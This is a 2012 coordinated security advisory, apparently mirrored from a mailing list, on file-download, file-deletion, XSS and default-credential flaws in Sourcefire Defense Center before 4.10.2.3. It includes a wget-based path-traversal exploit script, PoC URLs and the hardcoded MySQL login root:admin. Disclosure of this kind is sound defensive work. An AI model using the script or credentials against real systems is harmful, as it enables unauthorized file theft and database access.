Sourcefire Defense Center - multiple vulnerabilities.

2012-04-09T00:00:00
ID SECURITYVULNS:DOC:27877
Type securityvulns
Reporter Securityvulns
Modified 2012-04-09T00:00:00

Description

Hi list,

-- Product description (from vendor site): The Sourcefire Defense Center(R) management console is the "nerve center" of the Sourcefire 3D(R) System. It provides a powerful, easy-to-use interface for categorizing events, generating recurring reports, scheduling automated IPS, NGIPS, and NGFW detection content updates, configuring policies, and displaying customizable dashboards to quickly communicate sensor feedback.

-- Problem Description: The Sourcefire Defense Center(R) versions prior 4.10.2.3 were found to be vulnerable to Arbitrary File Download, Deletion of files in a specific directory, Persistent XSS and database access using default credentials in some circumstances.

-- Arbitrary File Download #1: An unauthenticated attacker is able to download files within the DOCUMENT_ROOT (not forbidden by Apache configuration, e.g. tar, yml etc.).

PoC: https://192.168.1.1/pagedata.yml CVSS: 4.7 (provided by vendor)

-- Arbitrary File Download #2: An unauthenticated attacker is able to download files that are readable by the Apache process, outside of DOCUMENT_ROOT.

PoC: included below CVSS: 6.7 (provided by vendor)

-- cut --

!/bin/sh

if [ -z $1 ] || [ -z $2 ]; then echo "$0 addr file" exit fi

echo "--+ Arbitrary File Download PoC for Sourcefire 3D Defense Center < 4.10.2.3 +--" echo ""

which wget &>/dev/null if [ $? -ne 0 ]; then echo "[!] wget not found." exit fi

echo "[-] trying to download \"$2\"..." echo "" wget "https://$1/ComparisonViewer/report.cgi?file=../../../../../$2"

if [ $? -eq 0 ]; then echo "[+] file saved." else echo "[!] file couldn't be saved." fi -- cut --

-- Deletion of files in a specific directory: An unathenticated attacker is able to delete files that reside within the "/var/tmp/streams" directory. This directory does not exist unless the Administrator creates it, and no files are stored there.

PoC: https://192.168.1.1/stream/ack.cgi?POSTDATA=foo CVSS: 2.8 (provided by vendor)

-- Permanent XSS: An authenticated attacker is able to bypass JavaScript validation and send direct POST request to the script, which is responsible for renaming the new tab in the dashboard. This may result in JavaScript code injection.

PoC: not provided CVSS: 2.8 (provided by vendor)

-- Database Access using Default Credentials: The attacker is able to access database remotely using default credentials (root:admin) if only the port 3306 is opened. This password is not meant to be changable. In addition, if an administrator has configured RUA functionality and authorized the RUA agent to a specific IP address it is then possible to use the RUA credentials to elevate MySQL privileges from that specifically authorized host.

PoC: not provided CVSS: not provided

-- Remediation: Affected users are encouraged to install updates provied by the vendor. The newest release at the time of this writing is 4.10.2.3.

-- Disclosure timeline: 20120320: detailed information about vulnerabilities and PoCs sent to vendor 20120320: vulnerabilities confirmed by vendor 20120321: fixes released by vendor 20120404: coordinated security advisory released

-- Credits: These vulnerabilities were found and reported by Filip Palian

-- Greetz: K&I, #dragonfly

Best regards, F